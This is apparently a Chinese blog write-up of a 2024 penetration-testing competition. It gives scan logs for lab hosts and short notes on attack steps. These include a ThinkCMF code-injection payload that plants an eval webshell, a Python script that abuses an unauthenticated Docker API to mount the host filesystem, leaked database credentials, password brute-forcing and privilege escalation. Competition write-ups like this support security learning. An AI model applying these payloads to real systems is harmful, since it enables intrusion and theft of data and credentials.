上海磐石渗透 2024
本文最后更新于 196 天前,其中的信息可能已经有所发展或是发生改变。

动作太慢,跟不上host✌的操作,但是比去年好多了

没有一个场景是完全打完的,渗透打得太少了

温故而知新

flag * 2
10.119.37.115:3306 open
10.119.37.115:8080 open
10.119.37.115:7680 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://10.119.37.115:8080 code:200 len:11     title:None
[+] PocScan http://10.119.37.115:8080 poc-yaml-phpstudy-backdoor-rce
  • 蚁剑配合bp,传个大马进去
192.168.123.66:445 open
192.168.123.66:1433 open
192.168.123.99:445 open
192.168.123.66:139 open
192.168.123.99:139 open
192.168.123.99:135 open
192.168.123.66:135 open
192.168.123.99:3306 open
192.168.123.99:8080 open
[*] alive ports len is: 9
start vulscan
[+] NetInfo:
[*]192.168.123.66
   [->]dbserver
   [->]10.119.63.244
   [->]192.168.123.66
   [->]192.168.113.66
[*] WebTitle:http://192.168.123.99:8080 code:200 len:11     title:None
[*] 192.168.123.66       NET\DBSERVER          Windows Server 2016 Datacenter 14393
[+] http://192.168.123.99:8080 poc-yaml-phpstudy-backdoor-rce
  • config.inc.php
<?php
/*
 * Generated configuration file
 * Generated by: phpMyAdmin 4.6.2 setup script
 * Date: Mon, 07 May 2018 10:48:03 +0000
 */

/* Servers configuration */
$i = 0;

/* Server: mssql [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'mssql';
$cfg['Servers'][$i]['host'] = 'mssql';
$cfg['Servers'][$i]['port'] = 3306;
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'yUzu73pd8bS2JJcb';

/* End of servers configuration */

$cfg['blowfish_secret'] = '';
$cfg['DefaultLang'] = 'en';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';
?>
  • 通过mssql进入第二台机器,cs直接getsystem提权
192.168.113.33:139 open
192.168.113.33:53 open
192.168.113.33:88 open
192.168.113.33:80 open
192.168.113.33:464 open
192.168.113.33:445 open
192.168.113.33:135 open
192.168.113.33:389 open
192.168.113.33:593 open
192.168.113.33:636 open
192.168.113.33:3268 open
192.168.113.33:3269 open
192.168.113.33:3389 open
192.168.113.33:5985 open
192.168.113.33:9389 open
192.168.113.33:49692 open
192.168.113.33:49672 open
192.168.113.33:49669 open
192.168.113.33:49668 open
192.168.113.33:49670 open
192.168.113.33:49666 open
192.168.113.33:51491 open
[*] alive ports len is: 22
start vulscan
[+] NetInfo:
[*]192.168.113.33
   [->]BDC
   [->]192.168.113.33
   [->]10.232.180.80
[*] WebTitle:http://192.168.113.33     code:200 len:703    title:IIS Windows Server
[*] WebTitle:http://192.168.113.33:5985 code:404 len:315    title:Not Found
[*] 192.168.113.33 [+]DC NET\BDC               Windows Server 2016 Datacenter 14393
[*] 192.168.113.33  (Windows Server 2016 Datacenter 14393)

各显神通

flag * 1
10.119.180.229:80 open
10.119.180.229:3389 open
  • 爆破得到
admin/admin888
  • ThinkCMF 后台RCE CVE-2019-7580
//在分类管理处添加新分类,只能打一次,不然就重开,就因为第一次测了个phpinfo,导致时间来不及交flag,差几秒
1'=>array(""),eval($_POST["cmd"]),'2

快乐行程

flag * 3
10.119.144.248:22 open
10.119.144.248:3000 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.119.144.248:3000 code:200 len:1746   title:YApi-高效、易用、功能强大的可视化接口管理平台
  • Yapi NoSQL导致的RCE漏洞
{
  "port": "3000",
  "adminAccount": "admin@admin.com",
  "timeout":120000,
  "db": {
    "servername": "127.0.0.1",
    "DATABASE": "yapi",
    "port": 27017,
    "user": "admin",
    "pass": "123456",
    "authSource": ""
  },
  "mail": {
    "enable": true,
    "host": "smtp.163.com",
    "port": 465,
    "from": "***@163.com",
    "auth": {
      "user": "***@163.com",
      "pass": "*****"
    }
  }
}
  • sudo -i提权
192.168.99.77:22 open
192.168.99.77:2375 open
192.168.99.72:22 open
192.168.99.72:3000 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://192.168.99.72:3000 code:200 len:1746   title:YApi-高效、易用、功能强大的可视化接口管理平台
[*] WebTitle: http://192.168.99.77:2375 code:404 len:29     title:None
[+] http://192.168.99.77:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://192.168.99.77:2375 poc-yaml-go-pprof-leak
  • docker api 未授权,定时任务弹shell
import docker

client = docker.DockerClient(base_url='http://192.168.99.77:2375/')
data = client.containers.run('alpine:latest',
                             r'''cat /tmp/root/flag''',
                             remove=True, volumes={'/': {'bind': '/tmp', 'mode': 'rw'}})

print(data.decode())
[*] WebTitle: http://192.168.66.105:2375 code:404 len:29     title:None
[*] WebTitle: http://192.168.66.33:9200 code:200 len:538    title:None
[+] http://192.168.66.105:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://192.168.66.33:9200 poc-yaml-elasticsearch-unauth
[+] http://192.168.66.105:2375 poc-yaml-go-pprof-leak
yellow open internal d8YjxF5wTm2RaL9Fv6CqYw 1 1  1 0  6.5kb  6.5kb
yellow open casa     rjR1j0FcRwWcOXb0H2L6lg 1 1  0 0   208b   208b
yellow open test     eNK-IjwKSgi54wZkC5vOJQ 1 1  1 0  3.8kb  3.8kb
yellow open service  uGUsn9D3R-uYiZFIa3CCww 1 1 46 0   53kb   53kb
yellow open my_index 6hHWlnRqQSSxzIUl0_arDg 1 1  1 0  4.7kb  4.7kb
yellow open minio    SssNCb_sQ62yJgj26YwfMQ 1 1  4 0 12.2kb 12.2kb
yellow open api      qffhtqNHRHakTOGAEx9Pew 1 1  2 0  9.2kb  9.2kb
  • /root/.ssh/id_rsa存在私钥,直连第三台
192.168.0.53:445 open
192.168.0.53:139 open
192.168.0.53:135 open
[*] alive ports len is: 3
start vulscan
[*] NetBios 192.168.0.53    WORKGROUP\DESKTOP-4GEUECL     
[*] NetInfo 
[*]192.168.0.53
   [->]DESKTOP-4GEUECL
   [->]192.168.0.53
   [->]10.223.61.201
  • elasticsearch未授权出找到几对用户名密码,爆破出第四台rdp

多年前的约定

flag * 1
10.119.58.123:111 open
10.119.58.123:22 open
10.119.58.123:9876 open
10.119.58.123:10911 open
10.119.58.123:10912 open
10.119.58.123:10909 open
  • CVE-2023-33246
192.168.17.77:593 open
192.168.17.77:465 open
192.168.17.77:25 open
192.168.17.77:443 open
192.168.17.77:587 open
192.168.17.77:444 open
192.168.17.77:445 open
192.168.17.77:135 open
192.168.17.77:475 open
192.168.17.77:477 open
192.168.17.77:476 open
192.168.17.77:53 open
192.168.17.77:464 open
192.168.17.77:139 open
192.168.17.77:88 open
192.168.17.77:80 open
192.168.17.77:81 open
192.168.17.77:717 open
192.168.17.77:636 open
192.168.17.77:389 open
192.168.17.77:808 open
192.168.17.77:890 open
192.168.17.77:1801 open
192.168.17.77:2107 open
192.168.17.77:2103 open
192.168.17.77:2105 open
192.168.17.77:2525 open
192.168.17.77:3268 open
192.168.17.77:3269 open
192.168.17.77:3389 open
192.168.17.77:3803 open
192.168.17.77:3800 open
192.168.17.77:3801 open
192.168.17.77:3843 open
192.168.17.77:3823 open
192.168.17.77:3828 open
192.168.17.77:3875 open
192.168.17.77:3867 open
192.168.17.77:3863 open
192.168.17.77:5060 open
192.168.17.77:5062 open
192.168.17.77:5065 open
192.168.17.77:5985 open
192.168.17.77:6001 open
192.168.17.77:6034 open
192.168.17.77:6042 open
192.168.17.77:6083 open
192.168.17.77:6402 open
192.168.17.77:6407 open
192.168.17.77:6409 open
192.168.17.77:6405 open
192.168.17.77:6406 open
192.168.17.77:6403 open
192.168.17.77:6400 open
192.168.17.77:6401 open
192.168.17.77:6412 open
192.168.17.77:6419 open
192.168.17.77:6428 open
192.168.17.77:6453 open
192.168.17.77:6469 open
192.168.17.77:6472 open
192.168.17.77:6481 open
192.168.17.77:6480 open
192.168.17.77:6483 open
192.168.17.77:6482 open
192.168.17.77:6486 open
192.168.17.77:6494 open
192.168.17.77:6497 open
192.168.17.77:6502 open
192.168.17.77:6509 open
192.168.17.77:6522 open
192.168.17.77:6529 open
192.168.17.77:6532 open
192.168.17.77:6546 open
192.168.17.77:6547 open
192.168.17.77:6556 open
192.168.17.77:6559 open
192.168.17.77:6586 open
192.168.17.77:6587 open
192.168.17.77:6598 open
192.168.17.77:6608 open
192.168.17.77:6680 open
192.168.17.77:6682 open
192.168.17.77:6691 open
192.168.17.77:6693 open
192.168.17.77:7227 open
192.168.17.77:8172 open
192.168.17.77:9389 open
192.168.17.77:9710 open
192.168.17.77:13634 open
192.168.17.77:22366 open
192.168.17.77:22367 open
192.168.17.77:22389 open
192.168.17.77:22408 open
192.168.17.77:22418 open
192.168.17.77:22423 open
192.168.17.77:22462 open
192.168.17.77:22494 open
192.168.17.77:35384 open
192.168.17.77:35399 open
192.168.17.77:47001 open
192.168.17.77:64327 open
192.168.17.77:64337 open
[*] alive ports len is: 103
start vulscan
[*] WebTitle http://192.168.17.77:81   code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle http://192.168.17.77:3800 code:404 len:315    title:Not Found
[*] WebTitle http://192.168.17.77:5985 code:404 len:315    title:Not Found
[*] WebTitle http://192.168.17.77      code:403 len:0      title:None
[*] WebTitle http://192.168.17.77:47001 code:404 len:315    title:Not Found
[*] NetBios 192.168.17.77   [+] DC:owa.ctfsec.local              Windows Server 2016 Datacenter 14393
[*] OsInfo 192.168.17.77        (Windows Server 2016 Datacenter 14393)
[*] WebTitle https://192.168.17.77     code:302 len:0      title:None 跳转url: https://192.168.17.77/owa/
[*] WebTitle https://192.168.17.77:8172 code:404 len:0      title:None
[*] WebTitle https://192.168.17.77/owa/auth/logon.aspx?url=https%3a%2f%2f192.168.17.77%2fowa%2f&reason=0 code:200 len:28244  title:Outlook
[*] WebTitle https://192.168.17.77:444 code:500 len:3367   title:运行时错误
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇